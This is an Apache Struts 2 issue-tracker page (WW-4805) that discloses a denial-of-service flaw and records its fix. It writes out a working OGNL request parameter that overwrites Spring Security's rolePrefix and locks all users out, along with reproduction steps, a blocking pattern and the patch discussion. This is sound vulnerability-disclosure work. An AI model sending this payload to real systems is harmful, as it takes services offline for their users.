Uploaded image for project: 'Struts 2'
  1. Struts 2
  2. WW-4805

At least a DoS attack is available for Spring secured actions

    Details

    • Flags:
      Patch, Important

      Description

      This is a DoS attack example when Struts2 user uses Spring to secure his actions, like mentioned at section `Initializing Actions from Spring` of spring-plugin

      Attack Steps:

      1. An anonymous user logins as an authenticated user.
      2. Then tries
        http://{ip}:{port}/{action0-actionN}?advisors[{0-n}].advice.accessDecisionManager.decisionVoters[{0-n}].rolePrefix=breakit
        

        where

        {action0-actionN}

        are actions available for users

      Attack Impacts:
      By replacing `rolePrefix`, attacker blocks access to secured actions for all defined roles even if they authenticate via login! so services are down and webapp restart is required to back to normal!!!

      Configuration Example:

      • spring-security.xml
            <global-method-security secured-annotations="enabled" proxy-target-class = "true" />
            <http auto-config="true" use-expressions="false">
                <intercept-url pattern="/**" access="IS_AUTHENTICATED_ANONYMOUSLY" />
            </http>
            <authentication-manager erase-credentials="false">
                <authentication-provider>
                    <user-service>
                        <user name="admin" password="admin" authorities="ROLE_ADMIN" />
                        <user name="user" password="user" authorities="ROLE_USER" />
                    </user-service>
                </authentication-provider>
            </authentication-manager>
        
      • applicationContext.xml
        <bean id="secureAction" class="me.zamani.yasser.ww_convention.actions.SecureAction"/>
        
      • struts.xml
                <action name="admin" class="secureAction" method="admin">
                    <result name="success" type="json" />
                </action>
                <action name="user" class="secureAction" method="user">
                    <result name="success" type="json" />
                </action>
        
      • SecureAction.java
        package me.zamani.yasser.ww_convention.actions;
        import org.springframework.security.access.annotation.Secured;
        
        public class SecureAction {
        
            @Secured({"ROLE_ADMIN"})
            public String admin() {
                return "success";
            }
            @Secured({"ROLE_USER"})
            public String user() {
                return "success";
            }
        }
        
      • login via
        http://{ip}:{port}/login
        

        as user.

      • open
        http://{ip}:{port}/user?advisors[0].advice.accessDecisionManager.decisionVoters[0].rolePrefix=breakit
        
      • in another browser, login via
        http://{ip}:{port}/login
        

        as admin.

      • try to access
        http://{ip}:{port}/admin
        

        which fails!

      • also repeat 5 and try open
         http://{ip}:{port}/user
        

        which also fails!

      • Services are down and webapp restart is required to back to normal.

        Issue Links

          Activity

          Hide
          githubbot ASF GitHub Bot added a comment -

          Github user lukaszlenart commented on the issue:

          https://github.com/apache/struts/pull/142

          The case with those changes is that they will affect everyone even if you don't use Spring so its scope should be narrowed just to the Spring Plugin. The simplest solution is to add a flag, a constant that by default should turn off this check, but the Spring Plugin should have this flag set on to enabled additional scanning.

          The ultimate solution would be a voter mechanism injectable by the internal DI mechanism but this requires a bit more work.

          Show
          githubbot ASF GitHub Bot added a comment - Github user lukaszlenart commented on the issue: https://github.com/apache/struts/pull/142 The case with those changes is that they will affect everyone even if you don't use Spring so its scope should be narrowed just to the Spring Plugin. The simplest solution is to add a flag, a constant that by default should turn off this check, but the Spring Plugin should have this flag set on to enabled additional scanning. The ultimate solution would be a voter mechanism injectable by the internal DI mechanism but this requires a bit more work.
          Hide
          aleksandr-m Aleksandr Mashchenko added a comment -

          <constant name="struts.additional.excludedPatterns" value=".\.accessDecisionManager\.." /> Will save the day.

          Show
          aleksandr-m Aleksandr Mashchenko added a comment - <constant name="struts.additional.excludedPatterns" value=". \.accessDecisionManager\.. " /> Will save the day.
          Hide
          githubbot ASF GitHub Bot added a comment -

          Github user aleksandr-m commented on the issue:

          https://github.com/apache/struts/pull/142

          @lukaszlenart Sounds good. Still, it would be nice to allow to turn this checking completely off even when spring plugin is presented. The issue then can be avoided with addition of a simple pattern which should be faster.

          Show
          githubbot ASF GitHub Bot added a comment - Github user aleksandr-m commented on the issue: https://github.com/apache/struts/pull/142 @lukaszlenart Sounds good. Still, it would be nice to allow to turn this checking completely off even when spring plugin is presented. The issue then can be avoided with addition of a simple pattern which should be faster.
          Hide
          githubbot ASF GitHub Bot added a comment -

          Github user lukaszlenart commented on the issue:

          https://github.com/apache/struts/pull/142

          With the flag in place you can always disable it in your struts.xml event it the Spring Plugin is present.

          Show
          githubbot ASF GitHub Bot added a comment - Github user lukaszlenart commented on the issue: https://github.com/apache/struts/pull/142 With the flag in place you can always disable it in your struts.xml event it the Spring Plugin is present.
          Hide
          githubbot ASF GitHub Bot added a comment -

          Github user yasserzamani commented on the issue:

          https://github.com/apache/struts/pull/142

          Thank you @lukaszlenart , I got your point but what about when user uses Spring but not S2's Spring Plugin? i.e. when user does not want to define his/her actions as Spring beans but wants to use AOP on them.

          However, now, after my forth commit, I don't think we should be worry. I tested WW-4805's scenario heavily with hundreds concurrent users via JMeter while profiling via YourKit. All of `ProxyUtil` methods just consume 186ms of the whole execution time, 137000ms, i.e. 0.001% ~= 0%. Before caching it was 7%.

          Show
          githubbot ASF GitHub Bot added a comment - Github user yasserzamani commented on the issue: https://github.com/apache/struts/pull/142 Thank you @lukaszlenart , I got your point but what about when user uses Spring but not S2's Spring Plugin? i.e. when user does not want to define his/her actions as Spring beans but wants to use AOP on them. However, now, after my forth commit, I don't think we should be worry. I tested WW-4805 's scenario heavily with hundreds concurrent users via JMeter while profiling via YourKit. All of `ProxyUtil` methods just consume 186ms of the whole execution time, 137000ms, i.e. 0.001% ~= 0%. Before caching it was 7%.
          Hide
          githubbot ASF GitHub Bot added a comment -

          Github user lukaszlenart commented on the issue:

          https://github.com/apache/struts/pull/142

          Yeah I understand but still this affects non-Spring users. And I think this can go in as is and we can improve and think about the Voters mechanism in 2.6.

          Show
          githubbot ASF GitHub Bot added a comment - Github user lukaszlenart commented on the issue: https://github.com/apache/struts/pull/142 Yeah I understand but still this affects non-Spring users. And I think this can go in as is and we can improve and think about the Voters mechanism in 2.6.
          Hide
          githubbot ASF GitHub Bot added a comment -

          Github user lukaszlenart commented on the issue:

          https://github.com/apache/struts/pull/142

          If no objections I am going to merge this PR, btw. I have created a task to implement Voters
          https://issues.apache.org/jira/browse/WW-4807

          Show
          githubbot ASF GitHub Bot added a comment - Github user lukaszlenart commented on the issue: https://github.com/apache/struts/pull/142 If no objections I am going to merge this PR, btw. I have created a task to implement Voters https://issues.apache.org/jira/browse/WW-4807
          Hide
          githubbot ASF GitHub Bot added a comment -

          Github user cnenning commented on the issue:

          https://github.com/apache/struts/pull/142

          IMO this can be merged

          Show
          githubbot ASF GitHub Bot added a comment - Github user cnenning commented on the issue: https://github.com/apache/struts/pull/142 IMO this can be merged
          Hide
          jira-bot ASF subversion and git services added a comment -

          Commit 64788152910a84e7755a8302896a1fa2d5ecef7d in struts's branch refs/heads/master from Yasser Zamani
          [ https://git-wip-us.apache.org/repos/asf?p=struts.git;h=6478815 ]

          WW-4805 Improves ProxyUtil performance via caching

          Show
          jira-bot ASF subversion and git services added a comment - Commit 64788152910a84e7755a8302896a1fa2d5ecef7d in struts's branch refs/heads/master from Yasser Zamani [ https://git-wip-us.apache.org/repos/asf?p=struts.git;h=6478815 ] WW-4805 Improves ProxyUtil performance via caching
          Hide
          jira-bot ASF subversion and git services added a comment -

          Commit 4c386c663cf094a6d40d90c56c5983e14d518c26 in struts's branch refs/heads/master from Lukasz Lenart
          [ https://git-wip-us.apache.org/repos/asf?p=struts.git;h=4c386c6 ]

          WW-4805 Blocks ognl access to class members of Spring proxy

          Show
          jira-bot ASF subversion and git services added a comment - Commit 4c386c663cf094a6d40d90c56c5983e14d518c26 in struts's branch refs/heads/master from Lukasz Lenart [ https://git-wip-us.apache.org/repos/asf?p=struts.git;h=4c386c6 ] WW-4805 Blocks ognl access to class members of Spring proxy
          Hide
          githubbot ASF GitHub Bot added a comment -

          Github user asfgit closed the pull request at:

          https://github.com/apache/struts/pull/142

          Show
          githubbot ASF GitHub Bot added a comment - Github user asfgit closed the pull request at: https://github.com/apache/struts/pull/142
          Hide
          githubbot ASF GitHub Bot added a comment -

          Github user lukaszlenart commented on the issue:

          https://github.com/apache/struts/pull/142

          @yasserzamani do you want to port some of those changes to 2.3.33? Or at least implement what @aleksandr-m mentioned in a comment?

          Show
          githubbot ASF GitHub Bot added a comment - Github user lukaszlenart commented on the issue: https://github.com/apache/struts/pull/142 @yasserzamani do you want to port some of those changes to 2.3.33? Or at least implement what @aleksandr-m mentioned in a comment?
          Hide
          githubbot ASF GitHub Bot added a comment -

          Github user yasserzamani commented on the issue:

          https://github.com/apache/struts/pull/142

          @lukaszlenart , Yes with pleasure. I should come with a new PR but on branch support-2-3, right?

          Show
          githubbot ASF GitHub Bot added a comment - Github user yasserzamani commented on the issue: https://github.com/apache/struts/pull/142 @lukaszlenart , Yes with pleasure. I should come with a new PR but on branch support-2-3, right?
          Hide
          githubbot ASF GitHub Bot added a comment -

          Github user lukaszlenart commented on the issue:

          https://github.com/apache/struts/pull/142

          Yes, you must branch off from the `support-2-3` branch and open a PR against that branch after all

          Show
          githubbot ASF GitHub Bot added a comment - Github user lukaszlenart commented on the issue: https://github.com/apache/struts/pull/142 Yes, you must branch off from the `support-2-3` branch and open a PR against that branch after all
          Hide
          hudson Hudson added a comment -

          SUCCESS: Integrated in Jenkins build Struts-JDK7-master #639 (See https://builds.apache.org/job/Struts-JDK7-master/639/)
          WW-4805 Improves ProxyUtil performance via caching (yasser.zamani: rev 64788152910a84e7755a8302896a1fa2d5ecef7d)

          • (edit) core/src/main/java/com/opensymphony/xwork2/util/ProxyUtil.java
          Show
          hudson Hudson added a comment - SUCCESS: Integrated in Jenkins build Struts-JDK7-master #639 (See https://builds.apache.org/job/Struts-JDK7-master/639/ ) WW-4805 Improves ProxyUtil performance via caching (yasser.zamani: rev 64788152910a84e7755a8302896a1fa2d5ecef7d) (edit) core/src/main/java/com/opensymphony/xwork2/util/ProxyUtil.java
          Hide
          githubbot ASF GitHub Bot added a comment -

          Github user aleksandr-m commented on the issue:

          https://github.com/apache/struts/pull/142

          @lukaszlenart
          > The simplest solution is to add a flag, a constant that by default should turn off this check, but the Spring Plugin should have this flag set on to enable additional scanning.

          I'll create a PR implementing this in a few days.

          Show
          githubbot ASF GitHub Bot added a comment - Github user aleksandr-m commented on the issue: https://github.com/apache/struts/pull/142 @lukaszlenart > The simplest solution is to add a flag, a constant that by default should turn off this check, but the Spring Plugin should have this flag set on to enable additional scanning. I'll create a PR implementing this in a few days.
          Hide
          githubbot ASF GitHub Bot added a comment -

          GitHub user yasserzamani opened a pull request:

          https://github.com/apache/struts/pull/145

          WW-4805 Ports some of PR #142 changes to branch support-2-3

          Ports only security related changes of #142 to branch support-2-3

          You can merge this pull request into a Git repository by running:

          $ git pull https://github.com/yasserzamani/struts support-2-3-WW-4805

          Alternatively you can review and apply these changes as the patch at:

          https://github.com/apache/struts/pull/145.patch

          To close this pull request, make a commit to your master/trunk branch
          with (at least) the following in the commit message:

          This closes #145


          commit 583da3d5df5aeeded3beadca6305a98c5618e46b
          Author: Yasser Zamani <yasser.zamani@live.com>
          Date: 2017-06-21T12:10:29Z

          WW-4805 Blocks ognl access to class members of Spring proxy


          Show
          githubbot ASF GitHub Bot added a comment - GitHub user yasserzamani opened a pull request: https://github.com/apache/struts/pull/145 WW-4805 Ports some of PR #142 changes to branch support-2-3 Ports only security related changes of #142 to branch support-2-3 You can merge this pull request into a Git repository by running: $ git pull https://github.com/yasserzamani/struts support-2-3- WW-4805 Alternatively you can review and apply these changes as the patch at: https://github.com/apache/struts/pull/145.patch To close this pull request, make a commit to your master/trunk branch with (at least) the following in the commit message: This closes #145 commit 583da3d5df5aeeded3beadca6305a98c5618e46b Author: Yasser Zamani <yasser.zamani@live.com> Date: 2017-06-21T12:10:29Z WW-4805 Blocks ognl access to class members of Spring proxy
          Hide
          githubbot ASF GitHub Bot added a comment -

          Github user lukaszlenart commented on the issue:

          https://github.com/apache/struts/pull/145

          I'm not able to merge this PR as it also contains some changes from the `master` branch - I have no idea how does it happen, maybe some GitHub PR's magic :\ I will try to cherry-pick this.

          Show
          githubbot ASF GitHub Bot added a comment - Github user lukaszlenart commented on the issue: https://github.com/apache/struts/pull/145 I'm not able to merge this PR as it also contains some changes from the `master` branch - I have no idea how does it happen, maybe some GitHub PR's magic :\ I will try to cherry-pick this.
          Hide
          githubbot ASF GitHub Bot added a comment -

          Github user lukaszlenart commented on the issue:

          https://github.com/apache/struts/pull/145

          Did you cherry-pick changes from your original branch? As this is the only option to port changes merged to the `master` branch back to the `support-2-3` branch.

          Show
          githubbot ASF GitHub Bot added a comment - Github user lukaszlenart commented on the issue: https://github.com/apache/struts/pull/145 Did you cherry-pick changes from your original branch? As this is the only option to port changes merged to the `master` branch back to the `support-2-3` branch.
          Hide
          githubbot ASF GitHub Bot added a comment -

          Github user yasserzamani commented on the issue:

          https://github.com/apache/struts/pull/145

          😕 When I was in my branch `master`, I checked out my `support-2-3`. Then I pulled apache `support-2-3` then pushed into my `support-2-3`. I confirmed via github that my `support-2-3` and apache `support-2-3` are even ( at [here](https://github.com/yasserzamani/struts/tree/support-2-3) ). Then I checked out my `support-2-3` as a new branch named `support-2-3-WW-4805`. Finally I made my changes on it, then commit and push it as a new branch into my github, then create this PR against apache `support-2-3`.

          At github all things seems good!

          Show
          githubbot ASF GitHub Bot added a comment - Github user yasserzamani commented on the issue: https://github.com/apache/struts/pull/145 😕 When I was in my branch `master`, I checked out my `support-2-3`. Then I pulled apache `support-2-3` then pushed into my `support-2-3`. I confirmed via github that my `support-2-3` and apache `support-2-3` are even ( at [here] ( https://github.com/yasserzamani/struts/tree/support-2-3 ) ). Then I checked out my `support-2-3` as a new branch named `support-2-3- WW-4805 `. Finally I made my changes on it, then commit and push it as a new branch into my github, then create this PR against apache `support-2-3`. At github all things seems good!
          Hide
          githubbot ASF GitHub Bot added a comment -

          Github user yasserzamani commented on the issue:

          https://github.com/apache/struts/pull/145

          Forgot to say I did not any cherry-pick

          Show
          githubbot ASF GitHub Bot added a comment - Github user yasserzamani commented on the issue: https://github.com/apache/struts/pull/145 Forgot to say I did not any cherry-pick
          Hide
          githubbot ASF GitHub Bot added a comment -

          Github user lukaszlenart commented on the issue:

          https://github.com/apache/struts/pull/145

          So you have made all the changes by hand, not be merging in another branch, right?

          Show
          githubbot ASF GitHub Bot added a comment - Github user lukaszlenart commented on the issue: https://github.com/apache/struts/pull/145 So you have made all the changes by hand, not be merging in another branch, right?
          Hide
          githubbot ASF GitHub Bot added a comment -

          Github user yasserzamani commented on the issue:

          https://github.com/apache/struts/pull/145

          Yes. All done by coping just raw texts then delete or edit them. I was aware that merging will mix things up and is confusing so I avoided.

          Do you have trouble withe mirrored github or apache's original repository?

          Show
          githubbot ASF GitHub Bot added a comment - Github user yasserzamani commented on the issue: https://github.com/apache/struts/pull/145 Yes. All done by coping just raw texts then delete or edit them. I was aware that merging will mix things up and is confusing so I avoided. Do you have trouble withe mirrored github or apache's original repository?
          Hide
          githubbot ASF GitHub Bot added a comment -

          Github user lukaszlenart commented on the issue:

          https://github.com/apache/struts/pull/145

          After checking out your PR locally I cannot build it on JDK6 (Struts 2.3.x must be built on JDK 6)

          Show
          githubbot ASF GitHub Bot added a comment - Github user lukaszlenart commented on the issue: https://github.com/apache/struts/pull/145 After checking out your PR locally I cannot build it on JDK6 (Struts 2.3.x must be built on JDK 6)
          Hide
          githubbot ASF GitHub Bot added a comment -

          Github user yasserzamani commented on the issue:

          https://github.com/apache/struts/pull/145

          Thanks! I did not try JDK6. Please let me check.

          Show
          githubbot ASF GitHub Bot added a comment - Github user yasserzamani commented on the issue: https://github.com/apache/struts/pull/145 Thanks! I did not try JDK6. Please let me check.
          Hide
          githubbot ASF GitHub Bot added a comment -

          Github user yasserzamani commented on the issue:

          https://github.com/apache/struts/pull/145

          OK, I tried JDK6 which firstly has failed with heap out of memory message at `Running org.apache.struts2.components.UIComponentTest`. But when I replaced JDK with a 64bit version and `-Xmx2048m`, then `mvn -DskipAssembly=true install` exited successfully with code 0. Used Maven version was 3.2.5, latest JDK6 compatible maven.

          Do you get same error message as me (i.e. heap out of memory) when you use `mvn -X`?

          Show
          githubbot ASF GitHub Bot added a comment - Github user yasserzamani commented on the issue: https://github.com/apache/struts/pull/145 OK, I tried JDK6 which firstly has failed with heap out of memory message at `Running org.apache.struts2.components.UIComponentTest`. But when I replaced JDK with a 64bit version and `-Xmx2048m`, then `mvn -DskipAssembly=true install` exited successfully with code 0. Used Maven version was 3.2.5, latest JDK6 compatible maven. Do you get same error message as me (i.e. heap out of memory) when you use `mvn -X`?
          Hide
          githubbot ASF GitHub Bot added a comment -

          Github user lukaszlenart commented on the issue:

          https://github.com/apache/struts/pull/145

          Nope, I'm getting compilation errors:
          ```
          [ERROR] chainHistory = new LinkedList<>();
          ```

          which means when I fetch your PR it was merged against the `master` branch instead of the `support-2-3` - I need to figure out what's going on.

          Show
          githubbot ASF GitHub Bot added a comment - Github user lukaszlenart commented on the issue: https://github.com/apache/struts/pull/145 Nope, I'm getting compilation errors: ``` [ERROR] chainHistory = new LinkedList<>(); ``` which means when I fetch your PR it was merged against the `master` branch instead of the `support-2-3` - I need to figure out what's going on.
          Hide
          githubbot ASF GitHub Bot added a comment -

          Github user yasserzamani commented on the issue:

          https://github.com/apache/struts/pull/145

          @lukaszlenart , it seems it was occurred just on your local PC during git fetch and there is not any issue with github or original apache repositories. Please revert your local changes and try check out instance of fetch. I remember the fetch does a merge too!

          Show
          githubbot ASF GitHub Bot added a comment - Github user yasserzamani commented on the issue: https://github.com/apache/struts/pull/145 @lukaszlenart , it seems it was occurred just on your local PC during git fetch and there is not any issue with github or original apache repositories. Please revert your local changes and try check out instance of fetch. I remember the fetch does a merge too!
          Hide
          jira-bot ASF subversion and git services added a comment -

          Commit 583da3d5df5aeeded3beadca6305a98c5618e46b in struts's branch refs/heads/support-2-3 from Yasser Zamani
          [ https://git-wip-us.apache.org/repos/asf?p=struts.git;h=583da3d ]

          WW-4805 Blocks ognl access to class members of Spring proxy

          Show
          jira-bot ASF subversion and git services added a comment - Commit 583da3d5df5aeeded3beadca6305a98c5618e46b in struts's branch refs/heads/support-2-3 from Yasser Zamani [ https://git-wip-us.apache.org/repos/asf?p=struts.git;h=583da3d ] WW-4805 Blocks ognl access to class members of Spring proxy
          Hide
          jira-bot ASF subversion and git services added a comment -

          Commit ae5630197980fe431f84eb26523f3b23b71f91bc in struts's branch refs/heads/support-2-3 from Lukasz Lenart
          [ https://git-wip-us.apache.org/repos/asf?p=struts.git;h=ae56301 ]

          WW-4805 Ports proxy detection to 2.3

          Show
          jira-bot ASF subversion and git services added a comment - Commit ae5630197980fe431f84eb26523f3b23b71f91bc in struts's branch refs/heads/support-2-3 from Lukasz Lenart [ https://git-wip-us.apache.org/repos/asf?p=struts.git;h=ae56301 ] WW-4805 Ports proxy detection to 2.3
          Hide
          githubbot ASF GitHub Bot added a comment -

          Github user asfgit closed the pull request at:

          https://github.com/apache/struts/pull/145

          Show
          githubbot ASF GitHub Bot added a comment - Github user asfgit closed the pull request at: https://github.com/apache/struts/pull/145
          Hide
          githubbot ASF GitHub Bot added a comment -

          Github user lukaszlenart commented on the issue:

          https://github.com/apache/struts/pull/145

          Nope, I mean PRs are a GitHub specific feature, and looks like PR is always merged with the `master` branch so checking out the PR isn't an option to test non-`master` PRs

          https://help.github.com/articles/checking-out-pull-requests-locally/

          For reference:
          I had to add your repository as an another `remote` and fetch your branch directly and merge it into the `support-2-3` branch to workaround the above problem.

          Show
          githubbot ASF GitHub Bot added a comment - Github user lukaszlenart commented on the issue: https://github.com/apache/struts/pull/145 Nope, I mean PRs are a GitHub specific feature, and looks like PR is always merged with the `master` branch so checking out the PR isn't an option to test non-`master` PRs https://help.github.com/articles/checking-out-pull-requests-locally/ For reference: I had to add your repository as an another `remote` and fetch your branch directly and merge it into the `support-2-3` branch to workaround the above problem.
          Hide
          hudson Hudson added a comment -

          SUCCESS: Integrated in Jenkins build Struts-support-2-3-JDK6 #3 (See https://builds.apache.org/job/Struts-support-2-3-JDK6/3/)
          WW-4805 Blocks ognl access to class members of Spring proxy (yasser.zamani: rev 583da3d5df5aeeded3beadca6305a98c5618e46b)

          • (edit) xwork-core/src/test/java/com/opensymphony/xwork2/spring/ActionsFromSpringTest.java
          • (edit) xwork-core/src/main/java/com/opensymphony/xwork2/ognl/SecurityMemberAccess.java
          • (edit) xwork-core/src/test/resources/com/opensymphony/xwork2/spring/actionContext-xwork.xml
          • (add) xwork-core/src/main/java/com/opensymphony/xwork2/util/ProxyUtil.java
          Show
          hudson Hudson added a comment - SUCCESS: Integrated in Jenkins build Struts-support-2-3-JDK6 #3 (See https://builds.apache.org/job/Struts-support-2-3-JDK6/3/ ) WW-4805 Blocks ognl access to class members of Spring proxy (yasser.zamani: rev 583da3d5df5aeeded3beadca6305a98c5618e46b) (edit) xwork-core/src/test/java/com/opensymphony/xwork2/spring/ActionsFromSpringTest.java (edit) xwork-core/src/main/java/com/opensymphony/xwork2/ognl/SecurityMemberAccess.java (edit) xwork-core/src/test/resources/com/opensymphony/xwork2/spring/actionContext-xwork.xml (add) xwork-core/src/main/java/com/opensymphony/xwork2/util/ProxyUtil.java
          Hide
          githubbot ASF GitHub Bot added a comment -

          GitHub user yasserzamani opened a pull request:

          https://github.com/apache/struts/pull/147

          WW-4805: Adds constant to control proxy member access (support-2-3)

          Ports #146 to branch support-2-3.

          You can merge this pull request into a Git repository by running:

          $ git pull https://github.com/yasserzamani/struts support-2-3_WW-4805_2

          Alternatively you can review and apply these changes as the patch at:

          https://github.com/apache/struts/pull/147.patch

          To close this pull request, make a commit to your master/trunk branch
          with (at least) the following in the commit message:

          This closes #147


          commit 086b63735527d4bb0c1dd0d86a7c0374b825ff24
          Author: Yasser Zamani <yasser.zamani@live.com>
          Date: 2017-07-07T09:05:10Z

          Adds constant to control proxy member access


          Show
          githubbot ASF GitHub Bot added a comment - GitHub user yasserzamani opened a pull request: https://github.com/apache/struts/pull/147 WW-4805 : Adds constant to control proxy member access (support-2-3) Ports #146 to branch support-2-3. You can merge this pull request into a Git repository by running: $ git pull https://github.com/yasserzamani/struts support-2-3_ WW-4805 _2 Alternatively you can review and apply these changes as the patch at: https://github.com/apache/struts/pull/147.patch To close this pull request, make a commit to your master/trunk branch with (at least) the following in the commit message: This closes #147 commit 086b63735527d4bb0c1dd0d86a7c0374b825ff24 Author: Yasser Zamani <yasser.zamani@live.com> Date: 2017-07-07T09:05:10Z Adds constant to control proxy member access
          Hide
          githubbot ASF GitHub Bot added a comment -

          Github user asfgit closed the pull request at:

          https://github.com/apache/struts/pull/147

          Show
          githubbot ASF GitHub Bot added a comment - Github user asfgit closed the pull request at: https://github.com/apache/struts/pull/147

            People

            • Assignee:
              Unassigned
              Reporter:
              yasser.zamani Yasser Zamani
            • Votes:
              0 Vote for this issue
              Watchers:
              5 Start watching this issue

              Dates

              • Created:
                Updated:
                Resolved:

                Development